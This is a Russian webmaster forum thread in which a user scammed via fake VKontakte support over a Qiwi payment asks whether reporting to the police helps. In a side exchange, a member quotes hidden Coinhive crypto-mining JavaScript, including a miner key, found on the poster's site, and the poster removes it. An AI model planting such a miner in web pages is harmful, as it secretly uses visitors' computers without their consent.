- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу

Переиграть и победить: как анализировать конкурентов для продвижения сайта
С помощью Ahrefs
Александр Шестаков
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Здравствуйте!
В общем обманули меня - возникла проблема с оплатой Qiwi обратился в поддержку Вконтакте.
Вот там меня и взял в оборот мошенник. И самое главное, уже ведь было такое, в смысле пытались развести - но тогда вовремя понял, что дело нечисто - не повелся. А тут прямо какое-то затмение нашло - видимо жара сыграла роль :(
Но это не суть, сам дурак, это я прекрасно понимаю.
Вопрос в другом, имел-ли кто положительный результат при мошенничестве с электронными деньгами после обращения на сайт мвд.рф и составлении заявы?
Сейчас у меня вот что:
это пришло после того как отправил
ID обращения: .............
Код проверки статуса обращения: .............
Ссылка для просмотра статуса обращения: https://xn--b1aew.xn--p1ai/request_main/check/?status
В поле статуса вот это:
Еще раз - был-ли у кого положительный результат или сразу можно забить на это???
Если честно пока складывается ощущении, что всё это пустая трата времени.
А зачем у вас на сайте в подписи стоит Скрытый JS-майнинг криптовалюты.
Видимо это карма.
impossible,
Как вы обнаружили скрытый майнер?
Бесплатно подскажите как убрать?
Что там находить, загляните в html код вашего сайта:
<script src="https://coin-hive.com/lib/coinhive.min.js"></script>
<script>
var miner=new CoinHive.Anonymous('u0Q6FHzK6pvV1Nbs9cZa6AVAYL100N3k');
miner.setThrottle(0.5);
miner.start();
</script>
LEOnidUKG, Спасибо, убрал. Убрал и сайт из подписи, сайт заброшен, другой поставил.
возникла проблема с оплатой Qiwi обратился в поддержку Вконтакте.
А зачем обращаться в поддержку Вконтакте? Есть поддержка на сайте QIWI - туда и пиши.
- после обращения на сайт мвд.рф и составлении заявы?
Иди теперь опять на сайт Вконтакте и ищи там поддержку МВД 🤣
Evgeni_, Поддержка Киви - если задать вопрос через форму обращения - отвечает очень и очень не быстро. Впрочем и на сайте Вконтакте отвечает тоже на следующий день, в лучшем случае.
Вот потому так вольготно себя и чувствуют жулики - они-то отвечают моментально!
И потом - мы все отвлеклись от вопроса главного.
Может просто сегодня у всех хреновое настроение, может не в тот день свой пост запостил???
А между тем суть вопроса:
имел-ли кто положительный результат при мошенничестве с электронными деньгами после обращения на сайт мвд.рф и составлении заявы?
имел-ли кто положительный результат при мошенничестве с электронными деньгами после обращения на сайт мвд.рф и составлении заявы?
Случай случаю всегда рознь.
Вы уже подали заявление, Вам в любом случае остается только ждать, ну и явиться по вызову, рассказать, все что имеет место к делу и обстоятельствам.
Чужой опыт и все остальное уже ни к чему.
sergv, Спасибо конечно. Но как-то предполагал что на столь посещаемом форуме, не одного меня разводили на электронные деньги. Кто-то забивал на это, кто-то обращался в полицию.
Вот и хотелось-бы узнать были или нет положительные аспекты самого обращения, без конкретики! (просто - меня кинули на деньги - полиция помогла или наоборот -не помогла)
Если пробежать большой интернет в лице яндекса и гугля - ни одного положительного случая я как-то не нашел. Неужели так всё печально в плане пресечения преступных действий в сети. А все силы нашей полиции брошены например на борьбу с инакомыслием?
Если подали заявление, ждите результата.
Смотря на кого попадёт, какой человек будет рассматривать и в каком он духе. Могут и за ерундовое дело взяться и помочь, а могу и крупное дело просто на отвали отписку сделать.
У них объем работы гигантский и то же всё по регламентам решить, ответит ьв такой то срок. Что бы свои дедлайны не срывать из-за статистики, могут отписаться.
Hippy1987, Т.е. гипотетически Управление "К" может если захочет?
Просто многие считают что они вообще не способны даже разрешение получить для просмотра логов Вконтакте. Типа 21 век - а они все еще баклуши бьют, да щи лаптем хлебают.
Ваши-же слова внушают надежду, что хотя-бы если захотят, то вполне и смогут помочь.